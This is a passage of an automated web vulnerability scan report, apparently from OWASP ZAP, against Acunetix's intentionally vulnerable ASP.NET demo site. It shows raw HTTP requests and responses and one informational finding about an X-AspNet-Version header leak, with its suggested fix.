          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        23. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIG